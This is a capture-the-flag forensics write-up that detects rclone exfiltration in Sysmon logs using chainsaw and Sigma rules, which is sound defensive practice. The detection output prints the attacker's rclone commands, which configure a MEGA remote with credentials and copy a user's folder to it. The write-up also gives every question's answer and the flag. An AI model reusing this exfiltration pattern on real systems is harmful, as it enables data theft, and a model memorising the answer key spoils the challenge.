Write-up author: jon-brandy
Pandora's friend and partner, Wade, is the one that leads the investigation into the relic's location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade's research to the cloud. Using the tool called "chainsaw" and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
- NONE
- Unzipping the zip file shall resulting into 2 directories namely
Logs&sigma_rules.
- Well.. This challenge is very straight forward, based from the description we know that we need to use
chainsawwhich we can download from this:
https://github.com/WithSecureLabs/chainsaw
- I tried to use this on linux but it won't work properly for me, so i used it on windows.
COMMAND
.\chainsaw\chainsaw.exe hunt .\Logs\ -s .\sigma_rules\ --mapping .\chainsaw\mappings\sigma-event-logs-all.yml -o chainsaw-result.txtRESULT
[+] Group: Sigma
┌─────────────────────┬────────────────────────────┬───────┬───────────────────────┬──────────┬───────────┬─────────────────┬──────────────────────┐
│ timestamp │ detections │ count │ Event.System.Provider │ Event ID │ Record ID │ Computer │ Event Data │
├─────────────────────┼────────────────────────────┼───────┼───────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────┤
│ 2023-02-24 15:35:07 │ + Rclone Execution via │ 1 │ Microsoft-Windows-Sy │ 1 │ 76 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Us │
│ │ Command Line or PowerShell │ │ smon │ │ │ │ ers\wade\AppData\Loc │
│ │ │ │ │ │ │ │ al\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rcl │
│ │ │ │ │ │ │ │ one.exe" config crea │
│ │ │ │ │ │ │ │ te remote mega user │
│ │ │ │ │ │ │ │ majmeret@protonmail. │
│ │ │ │ │ │ │ │ com pass FBMeavdiaFZ │
│ │ │ │ │ │ │ │ bWzpMqIVhJCGXZ5XXZI1 │
│ │ │ │ │ │ │ │ qsU3EjhoKQw0rEoQqHyI │
│ │ │ │ │ │ │ │ ' │
│ │ │ │ │ │ │ │ Company: https://rcl │
│ │ │ │ │ │ │ │ one.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C: │
│ │ │ │ │ │ │ │ \Users\wade\AppData\ │
│ │ │ │ │ │ │ │ Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync f │
│ │ │ │ │ │ │ │ or cloud storage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E9490 │
│ │ │ │ │ │ │ │ 1809FF7CC5168C1E857D │
│ │ │ │ │ │ │ │ 4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade │
│ │ │ │ │ │ │ │ \AppData\Local\Temp\ │
│ │ │ │ │ │ │ │ rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medi │
│ │ │ │ │ │ │ │ um │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43- │
│ │ │ │ │ │ │ │ D892-63F8-4B6D-03000 │
│ │ │ │ │ │ │ │ 0000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rc │
│ │ │ │ │ │ │ │ lone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: ' │
│ │ │ │ │ │ │ │ "C:\Windows\System32 │
│ │ │ │ │ │ │ │ \WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" │
│ │ │ │ │ │ │ │ ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Wind │
│ │ │ │ │ │ │ │ ows\System32\Windows │
│ │ │ │ │ │ │ │ PowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 1 │
│ │ │ │ │ │ │ │ 0DA3E43-D8D2-63F8-9B │
│ │ │ │ │ │ │ │ 00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 588 │
│ │ │ │ │ │ │ │ 8 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP- │
│ │ │ │ │ │ │ │ UTDHED2\wade │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E4 │
│ │ │ │ │ │ │ │ 3-D92B-63F8-B100-000 │
│ │ │ │ │ │ │ │ 000000900 │
│ │ │ │ │ │ │ │ ProcessId: 3820 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED │
│ │ │ │ │ │ │ │ 2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 │
│ │ │ │ │ │ │ │ 15:35:07.336 │
├─────────────────────┼────────────────────────────┼───────┼───────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────┤
│ 2023-02-24 15:35:17 │ + Rclone Execution via │ 1 │ Microsoft-Windows-Sy │ 1 │ 78 │ DESKTOP-UTDHED2 │ CommandLine: '"C:\Us │
│ │ Command Line or PowerShell │ │ smon │ │ │ │ ers\wade\AppData\Loc │
│ │ │ │ │ │ │ │ al\Temp\rclone-v1.61 │
│ │ │ │ │ │ │ │ .1-windows-amd64\rcl │
│ │ │ │ │ │ │ │ one.exe" copy C:\Use │
│ │ │ │ │ │ │ │ rs\Wade\Desktop\Reli │
│ │ │ │ │ │ │ │ c_location\ remote:e │
│ │ │ │ │ │ │ │ xfiltration -v' │
│ │ │ │ │ │ │ │ Company: https://rcl │
│ │ │ │ │ │ │ │ one.org │
│ │ │ │ │ │ │ │ CurrentDirectory: C: │
│ │ │ │ │ │ │ │ \Users\wade\AppData\ │
│ │ │ │ │ │ │ │ Local\Temp\rclone-v1 │
│ │ │ │ │ │ │ │ .61.1-windows-amd64\ │
│ │ │ │ │ │ │ │ Description: Rsync f │
│ │ │ │ │ │ │ │ or cloud storage │
│ │ │ │ │ │ │ │ FileVersion: 1.61.1 │
│ │ │ │ │ │ │ │ Hashes: SHA256=E9490 │
│ │ │ │ │ │ │ │ 1809FF7CC5168C1E857D │
│ │ │ │ │ │ │ │ 4AC9CBB339CA1F6E21DC │
│ │ │ │ │ │ │ │ CE95DFB8E28DF799961 │
│ │ │ │ │ │ │ │ Image: C:\Users\wade │
│ │ │ │ │ │ │ │ \AppData\Local\Temp\ │
│ │ │ │ │ │ │ │ rclone-v1.61.1-windo │
│ │ │ │ │ │ │ │ ws-amd64\rclone.exe │
│ │ │ │ │ │ │ │ IntegrityLevel: Medi │
│ │ │ │ │ │ │ │ um │
│ │ │ │ │ │ │ │ LogonGuid: 10DA3E43- │
│ │ │ │ │ │ │ │ D892-63F8-4B6D-03000 │
│ │ │ │ │ │ │ │ 0000000 │
│ │ │ │ │ │ │ │ LogonId: '0x36d4b' │
│ │ │ │ │ │ │ │ OriginalFileName: rc │
│ │ │ │ │ │ │ │ lone.exe │
│ │ │ │ │ │ │ │ ParentCommandLine: ' │
│ │ │ │ │ │ │ │ "C:\Windows\System32 │
│ │ │ │ │ │ │ │ \WindowsPowerShell\v │
│ │ │ │ │ │ │ │ 1.0\powershell.exe" │
│ │ │ │ │ │ │ │ ' │
│ │ │ │ │ │ │ │ ParentImage: C:\Wind │
│ │ │ │ │ │ │ │ ows\System32\Windows │
│ │ │ │ │ │ │ │ PowerShell\v1.0\powe │
│ │ │ │ │ │ │ │ rshell.exe │
│ │ │ │ │ │ │ │ ParentProcessGuid: 1 │
│ │ │ │ │ │ │ │ 0DA3E43-D8D2-63F8-9B │
│ │ │ │ │ │ │ │ 00-000000000900 │
│ │ │ │ │ │ │ │ ParentProcessId: 588 │
│ │ │ │ │ │ │ │ 8 │
│ │ │ │ │ │ │ │ ParentUser: DESKTOP- │
│ │ │ │ │ │ │ │ UTDHED2\wade │
│ │ │ │ │ │ │ │ ProcessGuid: 10DA3E4 │
│ │ │ │ │ │ │ │ 3-D935-63F8-B200-000 │
│ │ │ │ │ │ │ │ 000000900 │
│ │ │ │ │ │ │ │ ProcessId: 5116 │
│ │ │ │ │ │ │ │ Product: Rclone │
│ │ │ │ │ │ │ │ RuleName: '-' │
│ │ │ │ │ │ │ │ TerminalSessionId: 1 │
│ │ │ │ │ │ │ │ User: DESKTOP-UTDHED │
│ │ │ │ │ │ │ │ 2\wade │
│ │ │ │ │ │ │ │ UtcTime: 2023-02-24 │
│ │ │ │ │ │ │ │ 15:35:17.516 │
└─────────────────────┴────────────────────────────┴───────┴───────────────────────┴──────────┴───────────┴─────────────────┴──────────────────────┘- Let's run nc to the host.
QUESTION 1
- Based from the result we have, the answer must be
[email protected].
QUESTION 2
- Ans -->
FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI.
QUESTION 3
- Ans -->
mega.
QUESTION 4
- Ans -->
3820.
QUESTION 5
- Ans -->
C:\Users\Wade\Desktop\Relic_location.
QUESTION 6
- Ans -->
exfiltration.
- Got the flag!
HTB{Rcl0n3_1s_n0t_s0_inn0c3nt_4ft3r_4ll}